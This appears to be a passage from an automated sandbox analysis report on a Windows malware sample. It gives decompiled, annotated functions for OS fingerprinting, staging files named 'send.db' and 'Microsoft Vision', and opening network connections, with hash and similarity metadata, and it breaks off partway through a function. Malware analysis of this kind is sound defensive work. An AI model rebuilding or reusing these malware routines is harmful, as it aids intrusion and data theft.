                                        • Part of subcall function 00253075: lstrcmpW.KERNEL32(?,?), ref: 0025307F
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                      • String ID: 4$8$Internet Explorer
                                      • API String ID: 708496175-747916358
                                      • Opcode ID: 054423995f2e99b4b91a6b392b39b133c35b13f7f82699e16651e197714889cb
                                      • Instruction ID: 00a99c570413f463e20a6d795a23f6aad6c85caa6548445a891278b1a557f9c9
                                      • Opcode Fuzzy Hash: 054423995f2e99b4b91a6b392b39b133c35b13f7f82699e16651e197714889cb
                                      • Instruction Fuzzy Hash: 05A12D70D20619ABCF04EFA5D8969EEBB79BF04341F108119F805B7252DB30AE69CF94
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 58%
                                      			E0025D9DD() {
                                      				intOrPtr _v6;
                                      				signed int _v12;
                                      				intOrPtr _v272;
                                      				intOrPtr _v280;
                                      				intOrPtr _v284;
                                      				char _v288;
                                      				struct HINSTANCE__* _t33;
                                      				intOrPtr _t35;
                                      				intOrPtr _t38;
                                      				intOrPtr _t53;
                                      				intOrPtr _t62;
                                      				_Unknown_base(*)()* _t69;
                                      				void* _t71;
                                      
                                      				_v288 = 0x11c;
                                      				_t33 = LoadLibraryA("ntdll.dll");
                                      				if(_t33 == 0) {
                                      					L3:
                                      					_t71 = 2;
                                      					if(_v272 != _t71) {
                                      						goto L43;
                                      					} else {
                                      						_t35 = _v6;
                                      						if(_t35 != 1) {
                                      							if(_t35 == 2 || _t35 == 3) {
                                      								if(_v284 != 5) {
                                      									if(_v284 != 6) {
                                      										if(_v284 != 0xa || _v280 != 0) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x2710;
                                      										}
                                      									} else {
                                      										_t38 = _v280;
                                      										if(_t38 != 0) {
                                      											if(_t38 != 1) {
                                      												if(_t38 != _t71) {
                                      													if(_t38 != 3) {
                                      														goto L43;
                                      													} else {
                                      														return (_v12 & 0x0000ffff) + 0x189c;
                                      													}
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x1838;
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x17d4;
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1770;
                                      										}
                                      									}
                                      								} else {
                                      									if(_v280 != 1) {
                                      										if(_v280 != _t71) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1450;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x13ec;
                                      									}
                                      								}
                                      							} else {
                                      								goto L43;
                                      							}
                                      						} else {
                                      							if(_v284 != 5) {                                  // dwMajorVersion of the RTL_OSVERSIONINFOEXW at _v288
                                      								if(_v284 != 6) {
                                      									if(_v284 != 0xa || _v280 != 0) {          // only 10.0 is recognised beyond 6.x
                                      										goto L43;
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x3e8;   // 10.0 -> 1000 + wServicePackMajor
                                      									}
                                      								} else {
                                      									_t53 = _v280;                             // dwMinorVersion
                                      									if(_t53 != 0) {
                                      										if(_t53 != 1) {
                                      											if(_t53 != _t71) {                // _t71 holds 2 (inferred from the 0/1/_t71/3 test order)
                                      												if(_t53 != 3) {
                                      													goto L43;
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x276;   // 6.3 -> 630 + SP
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x26c;       // 6.2 -> 620 + SP
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x262;           // 6.1 -> 610 + SP (the Windows 7 analysis host)
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x258;               // 6.0 -> 600 + SP
                                      									}
                                      								}
                                      							} else {
                                      								_t62 = _v280;                                 // dwMinorVersion
                                      								if(_t62 != 0) {
                                      									if(_t62 != 1) {
                                      										if(_t62 != _t71) {                        // _t71 == 2, as above
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x208;           // 5.2 -> 520 + SP
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x1fe;               // 5.1 -> 510 + SP
                                      									}
                                      								} else {
                                      									return (_v12 & 0x0000ffff) + 0x1f4;                   // 5.0 -> 500 + SP
                                      								}
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					_t69 = GetProcAddress(_t33, "RtlGetVersion");   // RtlGetVersion reports the real OS version, unaffected by compatibility manifests or shims
                                      					if(_t69 == 0) {
                                      						L43:
                                      						return 0;
                                      					} else {
                                      						 *_t69( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D9F5
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025DA05
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 9e707935453f0750dcebb89dfb796f770cf881e4275aea456845f548f494e7dc
                                      • Instruction ID: 6f4c954af86dc08f22d1dde720d0e69b26c965e5804774a3fe272c7e5b2e4c14
                                      • Opcode Fuzzy Hash: 9e707935453f0750dcebb89dfb796f770cf881e4275aea456845f548f494e7dc
                                      • Instruction Fuzzy Hash: 59416D30A2412E96DF348F55D8063FD73B59B51B4FF0008E5E945E01C1E6B8CEE8CA98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C:\Users\user\Desktop\4ifN8B061M.exe
                                      • API String ID: 0-3119849397
                                      • Opcode ID: 45347a26ce8f77680236a07694098a8b33db236ac047dbcf1bb75741270431e8
                                      • Instruction ID: 2a6ef321cf794836a799cfc5e86497fb82aabe5ca4a7f03de0f54679b13c3882
                                      • Opcode Fuzzy Hash: 45347a26ce8f77680236a07694098a8b33db236ac047dbcf1bb75741270431e8
                                      • Instruction Fuzzy Hash: BE419A75E20259AFDB21EF9998889AEBBFCEB99710F50019AE604D7300E7705940C750
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 85%
                                      			E00260FE0(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				signed int _v28;
                                      				char _v32;
                                      				short _v2080;                      // WCHAR path buffer; 0x400 characters are handed to GetTempPathW
                                      				void* _t45;
                                      
                                      				_t40 = __edx;
                                      				 *[es:ebx+0x46183c1] =  *[es:ebx+0x46183c1] + __ecx;   // decompiler artifact: this entry (0x260FE0) overlaps the real prologue of E00260FEC, 12 bytes later, so the first bytes decode as a bogus add; the body is otherwise identical to E00260FEC
                                      				_t45 = __ecx;
                                      				E00251052( &_v2080, 0, 0x400);     // zero the buffer (memset-style helper)
                                      				GetTempPathW(0x400,  &_v2080);
                                      				lstrcatW( &_v2080, L"send.db");    // -> %TEMP%\send.db; no bounds check on the concatenation
                                      				_t46 = _t45 + 4;
                                      				E00253264(_t45 + 4, E00253412( &_v8,  &_v2080));   // copy the path into the object field at this+4 (lstrlenW/lstrcpyW helpers, see APIs below)
                                      				E00255A2D(_v8);                    // release the temporary copy (VirtualFree)
                                      				_t8 =  &_v28;
                                      				_v28 = _v28 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v32 = 0x35;                       // record tag 0x35 ('5'); its meaning is not resolved in this report
                                      				asm("movups [ebp-0x14], xmm0");    // zero the 16 bytes following the tag
                                      				E002534A6(E0025358E( &_v32, _t40, _t46),  *_t8, _a4);
                                      				E00253492( &_v32);
                                      				return _a4;
                                      			}

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00261018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0026102A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: 5c7c2d9924104be53dd3d29fca300d1f4cd12e722518a263d5a61f998a76de6a
                                      • Instruction ID: b401a0e132b9d8734b4ace32f6d1321420835edf9d78031bfb3e75a42d7f0482
                                      • Opcode Fuzzy Hash: 5c7c2d9924104be53dd3d29fca300d1f4cd12e722518a263d5a61f998a76de6a
                                      • Instruction Fuzzy Hash: 27118271D5011DABCB10EB64DC46BEEB7BCAF54311F04C079B805A2182EB789B6ACB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 84%
                                      			E00260FEC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v8;
                                      				signed int _v28;
                                      				char _v32;
                                      				short _v2080;                      // WCHAR path buffer; 0x400 characters are handed to GetTempPathW
                                      				void* _t35;
                                      				void* _t37;
                                      
                                      				_t35 = __edx;
                                      				_t37 = __ecx;                      // this pointer of the object that receives the path
                                      				E00251052( &_v2080, 0, 0x400);     // zero the buffer (memset-style helper)
                                      				GetTempPathW(0x400,  &_v2080);
                                      				lstrcatW( &_v2080, L"send.db");    // -> %TEMP%\send.db; no bounds check on the concatenation
                                      				_t38 = _t37 + 4;
                                      				E00253264(_t37 + 4, E00253412( &_v8,  &_v2080));   // copy the path into the object field at this+4 (lstrlenW/lstrcpyW helpers, see APIs below)
                                      				E00255A2D(_v8);                    // release the temporary copy (VirtualFree)
                                      				_t8 =  &_v28;
                                      				_v28 = _v28 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v32 = 0x35;                       // record tag 0x35 ('5'); its meaning is not resolved in this report
                                      				asm("movups [ebp-0x14], xmm0");    // zero the 16 bytes following the tag
                                      				E002534A6(E0025358E( &_v32, _t35, _t38),  *_t8, _a4);
                                      				E00253492( &_v32);
                                      				return _a4;
                                      			}

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00261018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0026102A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: dfad4a41c4c5735c90bc2786559e19611cc2dd60accaf51292cf793c6d71306e
                                      • Instruction ID: 972edae19fa19d29b36a6e32c3811887ade40f9f1739b4c624fe1198a6ac6738
                                      • Opcode Fuzzy Hash: dfad4a41c4c5735c90bc2786559e19611cc2dd60accaf51292cf793c6d71306e
                                      • Instruction Fuzzy Hash: D2015E7191011DABCB10EB64DC46AEEB7BCAF54311F10C065A905A2081EB749B6ACB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 66%
                                      			E002613C8(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				char _v28;
                                      				char _v32;
                                      				short _v552;                       // WCHAR path buffer, 0x208 bytes = MAX_PATH characters
                                      				void* _t34;
                                      
                                      				_t34 = __edx;
                                      				_v8 = 0;
                                      				E00251052( &_v552, 0, 0x208);      // zero the buffer (memset-style helper)
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);   // 0x1c = CSIDL_LOCAL_APPDATA
                                      				lstrcatW( &_v552, L"\\Microsoft Vision\\");       // -> %LOCALAPPDATA%\Microsoft Vision\ ; no bounds check on the concatenation
                                      				E00253297( &_v8, _t34, 0,  &_v552);                // copy the path into a heap string held in _v8
                                      				_v32 = 0x3b;                       // record tag 0x3b (';'); its meaning is not resolved in this report
                                      				asm("xorps xmm0, xmm0");
                                      				_v28 = 0;
                                      				asm("movups [ebp-0x14], xmm0");    // zero the 16 bytes following the tag
                                      				E002534A6(E0025358E( &_v32, _t34,  &_v8), 0, _a4);
                                      				E00253492( &_v32);
                                      				E00255A2D(_v8);                    // release the heap string (VirtualFree)
                                      				return _a4;
                                      			}

                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002613F8
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0026140A
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: FolderFreePathVirtuallstrcat
                                      • String ID: ;$\Microsoft Vision\
                                      • API String ID: 1529938272-253167065
                                      • Opcode ID: 0eacff633f2fb1024864bf4974cd9fcf9aac6cf1f482f979f3867ca0d1b667da
                                      • Instruction ID: 4245fa46c9f3b8b48320343d6e5eea706a14a773bac25ced59a685ec1419924e
                                      • Opcode Fuzzy Hash: 0eacff633f2fb1024864bf4974cd9fcf9aac6cf1f482f979f3867ca0d1b667da
                                      • Instruction Fuzzy Hash: 55011BB1C1011DEACB10EBA0ED4ADDFBBBCAF18345F104155B905A2081EB74AB99CFD4
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      C-Code - Quality: 58%
                                      			E0025D469() {
                                      				intOrPtr _v6;                      // wProductType: byte 282 of the RTL_OSVERSIONINFOEXW at _v288
                                      				char _v288;                        // RTL_OSVERSIONINFOEXW (0x11c bytes)
                                      				struct HINSTANCE__* _t4;
                                      				intOrPtr _t5;
                                      				_Unknown_base(*)()* _t9;
                                      
                                      				_v288 = 0x11c;                     // dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW)
                                      				_t4 = LoadLibraryA("ntdll.dll");
                                      				if(_t4 == 0) {
                                      					L3:                            // as decompiled, a failed LoadLibraryA also lands here and tests the uninitialised struct
                                      					_t5 = _v6;
                                      					if(_t5 == 2 || _t5 == 3) {     // VER_NT_DOMAIN_CONTROLLER or VER_NT_SERVER: the host is a server SKU
                                      						return 1;
                                      					} else {
                                      						goto L5;
                                      					}
                                      				} else {
                                      					_t9 = GetProcAddress(_t4, "RtlGetVersion");   // RtlGetVersion reports the real OS version, unaffected by compatibility manifests or shims
                                      					if(_t9 == 0) {
                                      						L5:
                                      						return 0;
                                      					} else {
                                      						 *_t9( &_v288);            // fill the struct
                                      						goto L3;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D481
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D491
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 4819fa932db7c91cf80bc646bb5d729c22096b617b388f3f018ee0a07d268497
                                      • Instruction ID: b393edd51db3c3ad06099b07016f5b7cff2712eeb7a52e9ad8b98d63ebd6cbda
                                      • Opcode Fuzzy Hash: 4819fa932db7c91cf80bc646bb5d729c22096b617b388f3f018ee0a07d268497
                                      • Instruction Fuzzy Hash: C9E068302A020907DF383F799C0F7D737A80F03746F0400A0EE8AD0081DA78D89ACAD4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 58%
                                      			E0025D4B8() {
                                      				intOrPtr _v272;            // +16 into the structure below: dwPlatformId
                                      				intOrPtr _v284;            // +4: dwMajorVersion
                                      				char _v288;                // start of an RTL_OSVERSIONINFOEXW (0x11c = 284 bytes)
                                      				struct HINSTANCE__* _t5;
                                      				_Unknown_base(*)()* _t8;   // RtlGetVersion, resolved at run time
                                      
                                      				_v288 = 0x11c;             // dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW)
                                      				// Resolves ntdll!RtlGetVersion by name instead of importing GetVersionEx;
                                      				// RtlGetVersion reports the real OS version regardless of compatibility-mode settings.
                                      				_t5 = LoadLibraryA("ntdll.dll");
                                      				if(_t5 == 0) {
                                      					L3:
                                      					if(_v272 != 2) {       // 2 = VER_PLATFORM_WIN32_NT
                                      						goto L5;
                                      					} else {
                                      						return _v284;      // major version (6 on the Windows 7 analysis system)
                                      					}
                                      				} else {
                                      					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                      					if(_t8 == 0) {
                                      						L5:
                                      						return 0;          // RtlGetVersion unavailable or platform is not NT
                                      					} else {
                                      						 *_t8( &_v288);    // RtlGetVersion(&osvi)
                                      						goto L3;
                                      					}
                                      				}
                                      			}
                                      
                                      Statement addresses in listing order: 0x0025d4c6, 0x0025d4d0, 0x0025d4d8, 0x0025d4f3, 0x0025d4fa, 0x00000000, 0x0025d4fc, 0x0025d503, 0x0025d503, 0x0025d4da, 0x0025d4e0, 0x0025d4e8, 0x0025d504, 0x0025d507, 0x0025d4ea, 0x0025d4f1, 0x00000000, 0x0025d4f1, 0x0025d4e8

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D4D0
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D4E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 785180bdd7dfe01db4543ba1d932049201575be9eb784520d2baf7aa2bd21b9d
                                      • Instruction ID: 35c5af61dbb6109af296a6ac3eedd1d43d9700be8b0e6c332021480ef5bdd282
                                      • Opcode Fuzzy Hash: 785180bdd7dfe01db4543ba1d932049201575be9eb784520d2baf7aa2bd21b9d
                                      • Instruction Fuzzy Hash: 7EE0123065021A97DB34AF65AC0BAD677B85B02749F4084D4EA09E1091EAB4D999CED0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 86%
                                      			E0025B66A() {
                                      				intOrPtr _t4;
                                      				void* _t5;
                                      				int _t9;
                                      				void* _t16;
                                      				void* _t17;
                                      
                                      				// Teardown: releases the global critical section, two global handles,
                                      				// Winsock, and the heap block at 0x267824.
                                      				DeleteCriticalSection(0x267bf8);
                                      				_t4 =  *0x267bec; // 0x0
                                      				if(_t4 != 0) {
                                      					CloseHandle(_t4);  // decompiler emitted "__eax = CloseHandle(__eax)"; __eax holds _t4 here
                                      				}
                                      				_t5 =  *0x267be4; // 0x0
                                      				if(_t5 != 0) {
                                      					CloseHandle(_t5);
                                      				}
                                      				L1();
                                      				__imp__#116(_t17); // executed; WS2_32 ordinal 116 = WSACleanup
                                      				E0025E221(0x2679fc);
                                      				E00252E66(0x267854);
                                      				E00252E66(0x267834);
                                      				_t16 =  *0x267824;
                                      				_t9 = VirtualFree(_t16, 0, 0x8000); // executed; 0x8000 = MEM_RELEASE
                                      				return _t9;
                                      			}
                                      
                                      Statement addresses in listing order: 0x0025b66f, 0x0025b675, 0x0025b67c, 0x0025b67f, 0x0025b67f, 0x0025b685, 0x0025b68c, 0x0025b68f, 0x0025b68f, 0x0025b69a, 0x00255110, 0x0025511c, 0x00255124, 0x0025512c, 0x00255131, 0x00255a35, 0x00255a3b

                                      APIs
                                      • DeleteCriticalSection.KERNEL32(00267BF8), ref: 0025B66F
                                      • CloseHandle.KERNEL32(00000000), ref: 0025B67F
                                      • CloseHandle.KERNEL32(00000000), ref: 0025B68F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CriticalDeleteSection
                                      • String ID: $x&
                                      • API String ID: 2166061224-4126032173
                                      • Opcode ID: c1cd06bbe0179ba2a0ca997f13cf48802157b4ebf8d092a2090b12d1e969bf82
                                      • Instruction ID: 19bf1e830860b75ba04d1ab0947cd5dab9d8bdbf1f0667c0bd84f038760e5ce8
                                      • Opcode Fuzzy Hash: c1cd06bbe0179ba2a0ca997f13cf48802157b4ebf8d092a2090b12d1e969bf82
                                      • Instruction Fuzzy Hash: 33D05E3432CB41CB97005FB1BC2C6293A9CBB447CE3008054FC1AD33A0EBB0CD688A68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 94%
                                      			E0025B4FE(signed int* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* _t22;
                                      				void* _t23;
                                      				void* _t33;
                                      				struct _CRITICAL_SECTION* _t43;
                                      				signed int* _t45;          // the five temporaries below were left undeclared by the decompiler
                                      				signed int* _t59;
                                      				intOrPtr _t62;
                                      				signed int* _t63;
                                      				void* _t66;
                                      				signed int _t67;
                                      				signed int _t69;
                                      
                                      				_t45 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t59 = __ecx;              // object whose state is guarded by the critical section at +0x3d8
                                      				_t43 = __ecx + 0x3d8;
                                      				EnterCriticalSection(_t43);
                                      				_t67 = _t59[0x7b];
                                      				_t62 = _a4;
                                      				if(_t59[0x7b] != 0) {
                                      					L2:
                                      					_t69 = _t59[3];
                                      					if(_t59[3] != 0) {
                                      						L5:
                                      						// Reached only once both connections (_t59[0x7b] and _t59[3]) exist.
                                      						_t63 =  &(_t59[0xf1]);
                                      						_t22 = E002520B4( &(_t59[0xf1]), 0);
                                      						__eflags = _t22;
                                      						if(_t22 == 0) {
                                      							E00251E9A(_t63);
                                      						}
                                      						_t23 = E002520B4( &(_t59[0xf3]), 0);
                                      						__eflags = _t23;
                                      						if(_t23 == 0) {
                                      							E00251E9A( &(_t59[0xf3]));
                                      						}
                                      						_v12 = _t59[4];
                                      						_v8 = _t59[0x7c];
                                      						E00251E6F(_t63, E0025B424,  &_v12);            // hands E0025B424 / E0025B491 the two contexts
                                      						E00251E6F( &(_t59[0xf3]), E0025B491,  &_v12);
                                      						 *_t59 = 1;                                     // busy flag, written under the lock
                                      						LeaveCriticalSection(_t43);
                                      						E002520B4( &(_t59[0xf1]), 0xffffffff);         // second call on each slot, lock released
                                      						E002520B4( &(_t59[0xf3]), 0xffffffff);
                                      						EnterCriticalSection(_t43);
                                      						 *_t59 =  *_t59 & 0x00000000;                   // clear the busy flag
                                      						LeaveCriticalSection(_t43);
                                      						E0025B6A9(_t59);
                                      						_t33 = 0;
                                      						__eflags = 0;
                                      					} else {
                                      						// First connection: fields at _a4 and _a4+4; E0025538F wraps
                                      						// getaddrinfo/socket/connect (see the subcall APIs listed below).
                                      						E00253222(_t66, _t62);
                                      						if(E0025538F( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
                                      							goto L5;
                                      						} else {
                                      							goto L4;
                                      						}
                                      					}
                                      				} else {
                                      					// Second connection: fields at _a4+8 and _a4+0xc.
                                      					E00253222(_t66, _t62 + 8);
                                      					if(E0025538F( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
                                      						L4:
                                      						LeaveCriticalSection(_t43);
                                      						_t33 = 1;                  // 1 = a connection attempt failed
